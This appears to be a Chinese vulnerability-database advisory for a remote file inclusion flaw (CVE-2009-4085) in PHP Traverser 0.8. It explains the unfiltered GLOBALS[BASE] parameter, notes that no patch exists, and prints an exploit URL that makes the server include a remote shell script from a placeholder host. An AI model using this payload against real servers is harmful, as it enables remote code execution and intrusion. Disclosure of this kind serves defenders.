添加时间:
2010-07-30

系统编号:
WAVDB-01690
BugCVE: CVE-2009-4085
BUGTRAQ: 41899

影响版本:
PHP Traverser 0.8

程序介绍:

PHP Traverser是用于在网页上递归浏览目录的PHP脚本。

漏洞分析:

PHP Traverser脚本没有正确地过滤提交给assets/plugins/mp3_id/mp3_id.php的GLOBALS[BASE]参数便用于包含文件，远程攻击者可以通过提交恶意的URL请求导致执行任意代码。

漏洞利用:

http://wavdb.com/[path]/assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=http://www.example.com/shell.txt?cmd

解决方案:
厂商补丁：
PHP Traverser
-------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://sourceforge.net/projects/phptraverse/

信息来源:
<*来源：Adhan Yantu

链接：http://secunia.com/advisories/37455
*>